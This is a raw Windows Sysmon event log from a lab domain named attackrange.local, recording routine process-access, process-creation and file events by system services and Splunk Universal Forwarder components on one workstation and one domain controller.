07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082272Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082271Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082270Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082269Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B376-615A-6801-00000000FD01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082268Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B376-615A-6801-00000000FD01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082267Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.782{2FDD8D40-B376-615A-6801-00000000FD01}3200C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082266Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.719{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57F77AC66E555F10D94CEB65D1D880D0,SHA256=A1CE2F5F3B16143FB2E2F5D29580660B5071956AFE805F1F7A08DBC272B42B3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082265Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:34.172{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD05727232D80F1FD5AAF5149925092B,SHA256=89632D73656130828A6FDEB086909F1E2C3810D410494119B9B85A1B9DE0AAEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104389Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:35.827{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E8AA9D2386C5EA31B87B4109B63FEC1,SHA256=1A64467CB3D38E0D72D305B3CEB40DD2BAB2E1226E1F8112135A90778622B48A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082295Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.860{2FDD8D40-B377-615A-6901-00000000FD01}31283140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082294Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B377-615A-6901-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082293Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082292Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082291Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082290Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082289Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082288Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082287Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082286Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082285Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082284Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B377-615A-6901-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082283Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.610{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B377-615A-6901-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082282Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:35.611{2FDD8D40-B377-615A-6901-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082312Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.974{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5AFD979EE6159CD220DF89CB8C94BB5,SHA256=5F141D85C2882FB727B1E3DDF829547EE0D38BCC23D2141290A3F929FDC3464C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104390Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:55:36.831{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FC6154740A769815ED9585D30725AD0,SHA256=4C9A3AAC3E3B87D7C1061E4850E8CDDA8AF8B2C11EEA5DF7B778EDF0E890AA0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082311Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.708{2FDD8D40-B378-615A-6A01-00000000FD01}25683712C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082310Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B378-615A-6A01-00000000FD01}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082309Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:55:36.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082308Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 